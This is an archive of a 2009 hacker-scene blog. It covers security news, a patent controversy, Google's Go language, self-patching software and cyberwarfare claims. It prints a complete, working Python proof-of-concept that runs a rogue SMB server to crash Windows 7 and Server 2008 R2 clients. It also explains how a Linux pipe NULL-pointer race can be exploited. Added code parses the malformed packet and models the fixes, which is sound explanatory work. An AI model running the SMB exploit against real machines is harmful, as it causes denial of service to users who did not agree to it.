
Friday, November 13, 2009

Windows 7 Kernel Crash bug , Microsoft "sudo" patent was bullshit , Blockhead's new album "The Music Scene"

HAPPY FRIDAY THE 13th! Just another excuse to cause digital ruckus. This lady is saying "Hmm, Friday the 13th? I think I will BSOD someone's Win7 box..."

Before I get to the sudo thing, let me post some links...

This first one is a device that lets you play games on your console remotely from your computer. Pretty neat, eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games

Next, I am sure you have all heard about the spreading iPhone worm that Rickrolls you, and about another one, dubbed iPhone/Privacy.A, that lets an attacker connect over SSH to any jailbroken iPhone whose owner never changed the default root password. Fun stuff. But check this out: the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing.

And for some more luls, Britney's Twitter account was hacked again.

+++++

Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo (superuser do) command. Of course I and others shit ourselves instantly. To no surprise, this claim was a bit off balance. First of all, here is a link to the patent, and now read this to understand a little better.

"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right."

"At arrow 6, user interface 116 presents a GUI to the user having at least one account with rights sufficient to permit the prohibited task. The graphical use interface may comprise one, many, or all accounts having sufficient rights. In some cases all of the accounts may be so many as to be cumbersome. In these cases, the user interface and/or rights elevator may select which to present based on various criteria, such as frequency of use, those associated with the current user, those with sufficient but not unlimited rights, and the like."

What the claims actually describe is a graphical rights elevator: when a task is refused because the current account lacks a right, the system pops up a UI listing accounts that do have it and lets the user authenticate as one of them, i.e. the over-the-shoulder credential prompt you get from UAC. sudo is a command-line tool that consults a policy file (sudoers) and runs a single command under another identity; it presents no list of accounts and no GUI, so the claims do not read on it at all. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!

Windows 7 / Server 2008R2 Remote Kernel Crash


Laurent Gaffié posted PoC code and some great information on this flaw on his blog, so there is no reason to rewrite it; just click the link above. Two things worth pulling out of the PoC itself: this is a client-side bug, so the victim has to be made to connect to the attacker's SMB server (typing \\attacker\share into Explorer is enough), and the trigger is a length mismatch: the NetBIOS session header claims 0x9a bytes of SMB2 NEGOTIATE response while 0x9e bytes actually follow, and the Windows 7 / 2008 R2 SMB client goes into a kernel-mode loop it never leaves. Here is the PoC:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
#infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash

#Author: Laurent Gaffié
#

import SocketServer  # Python 2; the module is called socketserver on Python 3

# A canned SMB2 NEGOTIATE response: 4-byte NetBIOS session header followed by
# 158 (0x9e) bytes of SMB2, but the header only admits to 0x9a of them.
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):
    """Whatever the client sends (its NEGOTIATE request) gets the malformed response."""

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        negotiate_req = self.request.recv(1024)  # the victim's request; contents ignored
        self.request.send(packet)
        self.request.close()


launch = SocketServer.TCPServer(('', 445), SMB2)  # listen all interfaces port 445
launch.serve_forever()
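To see exactly what the comment on the first line of the packet is pointing at, here is an added example (my code, not Laurent Gaffié's) that parses the NetBIOS session header and the SMB2 NEGOTIATE response the PoC sends, and cross-checks the declared length against the bytes on the wire and against the message's own SecurityBufferOffset + SecurityBufferLength. The frame is the PoC's bytes embedded as sample input; the function names (check_negotiate_response, fix_length) are mine, and the field layout follows the SMB2 header and NEGOTIATE response as documented in MS-SMB2. It runs on Python 3.

```python
import struct

# The PoC's frame, copied here as sample input: a 4-byte NetBIOS session header
# (type 0x00, 3-byte big-endian length) followed by the SMB2 message.
POC_FRAME = bytes.fromhex(
    "0000009a"                            # declared length 0x9a = 154
    "fe534d42400000000000000000000100"    # SMB2 header: \xfeSMB, size 64, cmd 0 (NEGOTIATE)
    "01000000000000000000000000000000"    # flags 0x1 = SERVER_TO_REDIR (a response)
    "00000000000000000000000000000000"
    "00000000000000000000000000000000"    # signature (unsigned, all zero)
    "41000100020200003082a411e3122341"    # NEGOTIATE response: size 65, dialect 0x0202, GUID...
    "aa4bad99fd52318d0100000000000100"
    "0000010000000100cf7367746260ca01"
    "cb51e0196260ca0180001e00204c4d20"    # SecurityBufferOffset 0x80, SecurityBufferLength 0x1e
    "601c06062b0601050502a0123010a00e"    # 30-byte SPNEGO blob (NTLMSSP OID)
    "300c060a2b06010401823702020a"
)

SMB2_HEADER = struct.Struct("<4sHHIHHIIQIIQ16s")     # 64 bytes
NEGOTIATE_RESP = struct.Struct("<HHHH16sIIIIQQHHI")  # 64-byte fixed part, StructureSize 65
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x1


def parse_netbios(frame):
    """NetBIOS session service header: message type, then a 3-byte big-endian
    length that is supposed to equal the number of bytes that follow."""
    if len(frame) < 4:
        raise ValueError("frame shorter than a NetBIOS header")
    return frame[0], int.from_bytes(frame[1:4], "big"), frame[4:]


def check_negotiate_response(frame):
    """Parse the SMB2 header and NEGOTIATE response and report whether the
    NetBIOS length, the byte count on the wire and the message's own idea of
    its size (SecurityBufferOffset + SecurityBufferLength) agree."""
    _, declared, body = parse_netbios(frame)
    if len(body) < SMB2_HEADER.size + NEGOTIATE_RESP.size:
        raise ValueError("truncated SMB2 NEGOTIATE response")
    hdr = SMB2_HEADER.unpack_from(body, 0)
    proto, hdr_size, command, flags = hdr[0], hdr[1], hdr[4], hdr[6]
    if proto != b"\xfeSMB" or hdr_size != SMB2_HEADER.size:
        raise ValueError("not an SMB2 header")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    neg = NEGOTIATE_RESP.unpack_from(body, SMB2_HEADER.size)
    struct_size, dialect, sec_offset, sec_length = neg[0], neg[2], neg[11], neg[12]
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    expected = sec_offset + sec_length  # the security blob is the last thing in the message
    return {
        "declared": declared,
        "actual": len(body),
        "expected": expected,
        "dialect": dialect,
        "consistent": declared == len(body) == expected,
    }


def fix_length(frame):
    """Rewrite the NetBIOS length so it matches the bytes that actually follow."""
    body = frame[4:]
    return bytes([frame[0]]) + len(body).to_bytes(3, "big") + body


if __name__ == "__main__":
    print("PoC frame:  ", check_negotiate_response(POC_FRAME))
    print("fixed frame:", check_negotiate_response(fix_length(POC_FRAME)))
```

On the PoC frame this reports declared 154, actual 158, expected 158: the message is internally consistent and only the session header lies. A receiver that does this three-way check drops the frame; the vulnerable client instead trusts the header and never gets out of its read loop. fix_length produces the frame with 0x9e in the header, which parses cleanly.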


+++++

I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. Here is a **** but please buy it if you like it. I have already pre-ordered the vinyl, which will be released Jan 5 of next year.

Link to AMAZON to buy the CD!

Link to other Blockhead and Aesop Rock media for sale!

And the next installment of "KewL GuY oF ThE wEeK" (extras for Friday the 13th)

Wednesday, November 11, 2009

Google GO Programming Language.

http://golang.org/

At first glance you might think, "wow, just another C-based object-oriented programming language", but you should know by now that Google always steps it up. The bottom line is that Go is fast as shit.

"The native Go compilers, called 6g and 8g (for 64-bit and x86), are designed to be extremely fast. There is also an alternative compiler called Gccgo that is based on the GNU Compiler Collection (GCC). The GCC-based compiler isn't as fast but is said to generate more efficient code. I was initially a bit surprised that Google chose not to use the Low-Level Virtual Machine (LLVM) compiler framework—it has a lot of LLVM expertise internally and is using it extensively for their awesome Python optimization effort. Pike says that LLVM was considered during the early stages of the Go project, but its compile-time performance was judged to be inadequate."

Here is the video promo for Go!

And a news article from Ars Technica.

Being open source, we can expect this project to grow and become part of the mainstream very soon. I highly doubt it will disappoint.

Tuesday, November 10, 2009

Software That patches itself + CBS 60 minutes on Cyber Warfare

Okay, I am getting input from IRC, so I will start posting what people are saying about this. Keep brainstorming and contact me if you have anything to add.

"By observing a program's normal behavior and assigning a set of rules, ClearView detects certain types of errors, particularly those caused when an attacker injects malicious input into a program. When something goes wrong, ClearView detects the anomaly and identifies the rules that have been violated. It then comes up with several potential patches designed to force the software to follow the violated rules. (The patches are applied directly to the binary, bypassing the source code.) ClearView analyzes these possibilities to decide which are most likely to work, then installs the top candidates and tests their effectiveness. If additional rules are violated, or if a patch causes the system to crash, ClearView rejects it and tries another."

http://www.technologyreview.com/computing/23821/

thoughts from IRC:

<@rhythmx> there are tons of auto analysis tools/ideas already... they are mostly full of fail
<@rhythmx> and running that tool inline seems like a bad idea... because then you just increased the potential attack surface even more
<@rhythmx> you could maybe trick it into flagging all normal requests as evil ones and DoS all the services
+++
<@neonfreon> if your vendor sucks so bad you have to get a third party binary autopatcher you have problems
<@neonfreon> even if it's doable it's really stupid
<@neonfreon> it's a non deterministic crazy ass software modifier basically doing automated QA and bug fixes on a live, production system
<@neonfreon> that's fucking retarded
<@neonfreon> nobody wants that kind of thing in their enterprise
<@neonfreon> do that in QA labs
<@neonfreon> it has to also suffer from undecidability issues somehow
<@neonfreon> halting problem type issues
<@neonfreon> detect and fault and shutdown is all anyone wants and it's whats out there already
+++
<@jazz> as far as the self-patching thing, I think it's great for the situation they described wrt radiation potentially fucking bits
<@jazz> but if they try to apply it to commercial software I'm gonna laugh my ass off
+++
<@eliteandevil> wonder if you can manipulate it so that it patches in a backdoor
<@eliteandevil> or makes it vuln to something
<@eliteandevil> making the unexploitable exploitable
<@jazz> I'm sure there'd be a way to poison the well
<@jazz> well remember that kernel bug a while back that only became an exploit due to compiler optimization?
<@jazz> I'm sure something similar would happen with this kinda technology
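The Technology Review quote describes a loop (observe normal runs, derive rules, detect a violation, synthesise patches that enforce the violated rule, keep the one that does not break anything), and the IRC crowd's objections are about what happens when the training data is wrong. Here is an added example of mine, not ClearView and not anything from the article, that models that loop in miniature: range invariants are learned from runs assumed benign, an oversized input violates one, two candidate repairs are tried, and the first one that stops the crash while leaving benign results unchanged wins. The target function, the invariant form (min/max per argument, with strings measured by length) and the sample requests are all constructed assumptions.

```python
BUF_SIZE = 16  # the constructed target's fixed-size "buffer"


def vulnerable_handler(name, count):
    """Constructed target: copying `name` into a 16-byte buffer. An oversized
    name stands in for memory corruption, so the model raises MemoryError."""
    if len(name) > BUF_SIZE:
        raise MemoryError("buffer overflow")
    return name * count


def _measure(value):
    """Invariants are over numbers; strings are measured by length."""
    return len(value) if isinstance(value, str) else value


def learn_invariants(traces):
    """Daikon-style [lo, hi] range per argument, learned from observed inputs."""
    inv = {}
    for args in traces:
        for key, value in args.items():
            v = _measure(value)
            lo, hi = inv.get(key, (v, v))
            inv[key] = (min(lo, v), max(hi, v))
    return inv


def violated(inv, args):
    """Arguments outside their learned range (empty list == looks normal)."""
    return [k for k, v in args.items()
            if not inv[k][0] <= _measure(v) <= inv[k][1]]


def candidate_patches(inv, key):
    """Repairs that force the input back inside the learned range, least disruptive first."""
    lo, hi = inv[key]

    def clamp(args):                      # shorten the string / clamp the number
        fixed = dict(args)
        v = fixed[key]
        fixed[key] = v[:hi] if isinstance(v, str) else max(lo, min(hi, v))
        return fixed

    def reject(args):                     # refuse the request outright
        if violated(inv, args):
            raise ValueError("rejected by patch")
        return args

    return [("clamp", clamp), ("reject", reject)]


def select_patch(handler, inv, traces, attack):
    """Name of the first candidate that keeps `attack` from crashing the handler
    and leaves every benign trace's result unchanged; None if nothing was
    violated or no candidate passes."""
    broken = violated(inv, attack)
    if not broken:
        return None
    for name, patch in candidate_patches(inv, broken[0]):
        try:
            handler(**patch(attack))
        except MemoryError:
            continue                      # still crashes: candidate rejected
        except ValueError:
            pass                          # request dropped: no crash
        if all(handler(**patch(t)) == handler(**t) for t in traces):
            return name
    return None


# Constructed sample traffic: four benign requests and one attacker request.
NORMAL_TRACES = [
    {"name": "alice", "count": 1},
    {"name": "bob", "count": 2},
    {"name": "charlie", "count": 3},
    {"name": "dave-admin", "count": 1},
]
ATTACK = {"name": "A" * 64, "count": 1}

if __name__ == "__main__":
    inv = learn_invariants(NORMAL_TRACES)
    print("learned:", inv)
    print("violated by attack:", violated(inv, ATTACK))
    print("patch chosen:", select_patch(vulnerable_handler, inv, NORMAL_TRACES, ATTACK))
    narrow = learn_invariants(NORMAL_TRACES[:2])   # trained on too little
    print("benign request flagged:", violated(narrow, {"name": "charlie", "count": 2}))
```

Both IRC objections fall out of the same two functions. Train on too narrow a window (the first two traces only) and a perfectly normal request is flagged, which is rhythmx's "DoS all the services" case. Let one attacker-sized request into the training set and the learned upper bound grows to cover the attack, which is jazz's "poison the well": violated() then returns nothing for the attack and the handler crashes exactly as before.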


____________________________________________________________________


"Much of it was still theory, but we were told that before too long it might be possible for a hacker with a computer to disable critical infrastructure in a major city and disrupt essential services, to steal millions of dollars from banks all over the world, infiltrate defense systems, extort millions from public companies, and even sabotage our weapons systems."

This article goes on to talk about the possibility of power grids being shut down through cyber warfare and other complete bullshit. I think they fail to realize we got along fine before the internet. Even if attackers could compromise things like power grids, I am sure there are fail-safe methods to bring them back up manually.

Here's some shit Daily Dave thought was WTF, and I agree.

- "Some foreign power" was able to penetrate the Pentagon by leaving infected thumbnail drives where military personnel would find them, and use them. On the plus side, NOW thumbdrives are banned.
- In 2007, "Some unknown foreign power" penetrated the Department of Defense, Department of State, Department of Commerce, and they even think NASA, and stole terabytes' worth of information. The method of attack wasn't disclosed as far as I remember.
- Some medical database owned by the state of Virginia was stolen, rm'd, encrypted, and ransomed. Sean Henry, who was describing it, didn't comment on whether or not the state actually paid the money, but his response seemed to imply that they did.

60 Minutes link. Cyber Warfare.

Daily Dave's rant

Monday, November 9, 2009

Linux kernel Pipe Null Pointer Deref race condition + Offensive-Security.com hacked

Before we get to the fun stuff, giggle at this. Offensive Security's website was hacked through a vuln in their Metasploit wiki. HEH. I'm not going to hate too much because I love BackTrack with all my heart. The attackers uploaded an ejeet PHP shell around the 6th and it went unnoticed for 28 hours. This just goes to show you that no one is safe. Here is the blog post!
___
This was posted on the 3rd on Xorl, so sorry for the delay. I have to mention it because it is a really good vuln. It lives in fs/pipe.c and is exploitable the same way spender's NULL pointer dereference exploits work: the kernel dereferences a pointer that has become NULL, so on a kernel that lets an unprivileged process mmap() page zero (mmap_min_addr not enforced) the attacker gets to supply the pipe_inode_info the kernel then operates on. With mmap_min_addr enforced it is still a reliable crash. The routine in question is called when you open a pipe for writing, and it increments inode->i_pipe->writers to record how many writers the pipe has. Here is that routine:

const struct file_operations write_pipefifo_fops = {
	...
	.open = pipe_write_open,
	...
};
...
static int
pipe_write_open(struct inode *inode, struct file *filp)
{
	mutex_lock(&inode->i_mutex);
	inode->i_pipe->writers++;	/* i_pipe is never checked: NULL if the pipe was just released */
	mutex_unlock(&inode->i_mutex);

	return 0;
}

As Xorl %eax, %eax explains, the NULL pointer dereference happens when one process opens a pipe at the same moment another one releases it and the release wins the race. pipe_release() decrements the reader/writer counts and, once both are zero, frees the pipe and sets inode->i_pipe to NULL; the open that follows then increments through that NULL pointer, because nothing in pipe_write_open() checks it. Both paths take i_mutex, but that only serialises them; it does nothing about the missing check. Here are the three functions that release the pipe:

static int
pipe_read_release(struct inode *inode, struct file *filp)
{
	return pipe_release(inode, 1, 0);
}

static int
pipe_write_release(struct inode *inode, struct file *filp)
{
	return pipe_release(inode, 0, 1);
}

static int
pipe_rdwr_release(struct inode *inode, struct file *filp)
{
	int decr, decw;

	decr = (filp->f_mode & FMODE_READ) != 0;
	decw = (filp->f_mode & FMODE_WRITE) != 0;
	return pipe_release(inode, decr, decw);
}
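To make the interleaving concrete, here is an added example of mine (not kernel code and not from Xorl's post): a user-space model of the two routines above. pipe_release() tears the pipe down and NULLs inode->i_pipe when the last reader and writer are gone; the original pipe_write_open() then increments through that pointer. The "fixed" open has the shape of the upstream change, which tests i_pipe under i_mutex and fails with -EINVAL instead of touching it. The structures, the single-threaded mutex and the oops counter are simplified stand-ins, and race_model() replays the two orderings sequentially rather than with real threads.

```c
/* User-space model of the fs/pipe.c race; not kernel code. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

struct pipe_inode_info { int readers; int writers; };
struct inode { int i_mutex; struct pipe_inode_info *i_pipe; };

static int oops_count;   /* NULL dereferences the real kernel would oops on */

/* single-threaded model: the lock is only recorded, never contended */
static void mutex_lock(int *m)   { (*m)++; }
static void mutex_unlock(int *m) { (*m)--; }

static struct inode *alloc_pipe(int readers, int writers)
{
    struct inode *inode = calloc(1, sizeof *inode);
    if (!inode) abort();
    inode->i_pipe = calloc(1, sizeof *inode->i_pipe);
    if (!inode->i_pipe) abort();
    inode->i_pipe->readers = readers;
    inode->i_pipe->writers = writers;
    return inode;
}

/* free_pipe_info(): this NULL assignment is what the opener later trips over */
static void free_pipe_info(struct inode *inode)
{
    free(inode->i_pipe);
    inode->i_pipe = NULL;
}

/* pipe_release(): drop the counts, tear the pipe down when both hit zero */
static int pipe_release(struct inode *inode, int decr, int decw)
{
    mutex_lock(&inode->i_mutex);
    inode->i_pipe->readers -= decr;
    inode->i_pipe->writers -= decw;
    if (!inode->i_pipe->readers && !inode->i_pipe->writers)
        free_pipe_info(inode);
    mutex_unlock(&inode->i_mutex);
    return 0;
}

/* Original pipe_write_open(): no check of i_pipe. The kernel would
 * dereference NULL here; the model counts the oops and returns -EFAULT. */
static int pipe_write_open_vuln(struct inode *inode)
{
    int ret = 0;
    mutex_lock(&inode->i_mutex);
    if (inode->i_pipe == NULL) {
        oops_count++;
        ret = -EFAULT;
    } else {
        inode->i_pipe->writers++;
    }
    mutex_unlock(&inode->i_mutex);
    return ret;
}

/* Fixed shape: check i_pipe while holding i_mutex, fail cleanly if the pipe is gone. */
static int pipe_write_open_fixed(struct inode *inode)
{
    int ret = -EINVAL;
    mutex_lock(&inode->i_mutex);
    if (inode->i_pipe) {
        inode->i_pipe->writers++;
        ret = 0;
    }
    mutex_unlock(&inode->i_mutex);
    return ret;
}

/* Replay one interleaving: the pipe's only reader/writer descriptor is closed
 * either before (release_first) or after a second process opens it for writing. */
static int race_model(int (*open_fn)(struct inode *), int release_first)
{
    struct inode *inode = alloc_pipe(1, 1);
    int ret;
    if (release_first) {
        pipe_release(inode, 1, 1);   /* pipe freed, i_pipe == NULL */
        ret = open_fn(inode);
    } else {
        ret = open_fn(inode);        /* writers becomes 2 ... */
        pipe_release(inode, 1, 1);   /* ... so the pipe survives the release */
    }
    free(inode->i_pipe);             /* free(NULL) is a no-op */
    free(inode);
    return ret;
}

int main(void)
{
    printf("release-then-open, original: %d (oopses so far: %d)\n",
           race_model(pipe_write_open_vuln, 1), oops_count);
    printf("release-then-open, fixed:    %d (oopses so far: %d)\n",
           race_model(pipe_write_open_fixed, 1), oops_count);
    return 0;
}
```

The release-then-open ordering is the only one that matters: with the original open it is an oops (here -EFAULT plus a bumped counter), with the checked open it is a clean -EINVAL back to userland, and in the open-then-release ordering both versions behave identically because the extra writer keeps the pipe alive.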

And while we are ripping information from Xorl, I guess I'll post this heap overflow in the Poppler PDF reader, which is of relatively little importance. Still a good article.

Saturday, November 7, 2009

What is this?

Friday, November 6, 2009

SSLV3 MiTM & str0ke funeral coverage.



I am sure a lot of you have heard about this by now: the renegotiation flaw lets a man-in-the-middle open his own connection to the server, send the first part of a request, and then splice the victim's handshake into that connection as a renegotiation, so the server treats the attacker's bytes as the prefix of the victim's authenticated request. Here are two good links on the subject. New links added as well.

http://www.g-sec.lu/Renegotiating%20TLS.pdf

https://www.ihteam.net/blog/hacking-tutorial/tls-sslv3-man-in-the-middle-attack/
/* I am fixing the code right now, I'll post the revision soon */ Here it is, by knife.

RIP str0ke!!!

http://www.h-i-r.net/2009/11/schrodingers-hacker.html

Okay, now THIS is a bit frightening.

"In Utah, the National Security Agency is building a $2 billion storage facility that will house and analyze all forms of electronic communication...a potential yottabyte of everyone's (formerly) personal data."

btw, a yottabyte is a 1 followed by 24 zeros (10^24 bytes), and here is the link from gizmodo